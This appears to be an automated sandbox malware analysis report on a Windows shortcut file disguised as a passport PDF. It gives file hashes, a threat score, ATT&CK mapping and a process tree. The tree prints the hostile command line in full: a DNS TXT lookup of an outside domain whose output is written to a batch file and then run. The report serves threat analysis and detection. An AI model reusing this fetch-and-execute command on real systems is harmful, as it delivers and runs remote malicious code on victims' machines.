9a1d62c7aa156b0920f87b422ab3685e60393fc97a0b742e533e791adcf5a31d

Analysis

max time kernel
122s
max time network
125s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
13-12-2023 08:34

Target

Passport20231023_90223 pdf lnk.lnk
Size

1KB
MD5

c97607e6e04da0e5ef7414821afba0f5
SHA1

2acd031bbb023660c5c214809ef7e32a040ad4dd
SHA256

9a1d62c7aa156b0920f87b422ab3685e60393fc97a0b742e533e791adcf5a31d
SHA512

a5a1d693b1da51fbdc46047af26697efd5f51bf1cc0928065a4cc67a19c1a39d58e68e8b7a70666d9d350c337f5bd5fb5c80fa796e35cc8b809c0b90c33b0b61

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 9 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 1828 wrote to memory of 2060	1828	cmd.exe	cmd.exe
PID 1828 wrote to memory of 2060	1828	cmd.exe	cmd.exe
PID 1828 wrote to memory of 2060	1828	cmd.exe	cmd.exe
PID 2060 wrote to memory of 2800	2060	cmd.exe	nslookup.exe
PID 2060 wrote to memory of 2800	2060	cmd.exe	nslookup.exe
PID 2060 wrote to memory of 2800	2060	cmd.exe	nslookup.exe
PID 2060 wrote to memory of 2616	2060	cmd.exe	findstr.exe
PID 2060 wrote to memory of 2616	2060	cmd.exe	findstr.exe
PID 2060 wrote to memory of 2616	2060	cmd.exe	findstr.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Passport20231023_90223 pdf lnk.lnk"
1⤵
- Suspicious use of WriteProcessMemory
PID:1828
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" cmd /k cd C:\Users\Admin\AppData\Local\Temp & NSlookup -type=TXT tos.viewdobdrv.com | findstr """" > Taste.cmd & Taste.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2060
- - C:\Windows\system32\nslookup.exe
    NSlookup -type=TXT tos.viewdobdrv.com
    3⤵
    PID:2800
- - C:\Windows\system32\findstr.exe
    findstr """"
    3⤵
    PID:2616

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

C:\Users\Admin\AppData\Local\Temp\Taste.cmd

Filesize
224B

MD5
e201ea24b4a9bc902fdba32adef12a1d

SHA1
2f612798e94d635629ee357cf9776c19ed54cef4

SHA256
f712c3e0e170c00971fe11a237799b6ae99f6bc55671a881f5875bf4fbf0d2fe

SHA512
643878798d08c99bdda2116b09127cba93cced257c1cbc1497c3929cf0a61dec001f2968e5a7638119c0c0fbd24116f3ba3abbcff13ffc574deebd8118ede766

Download Submit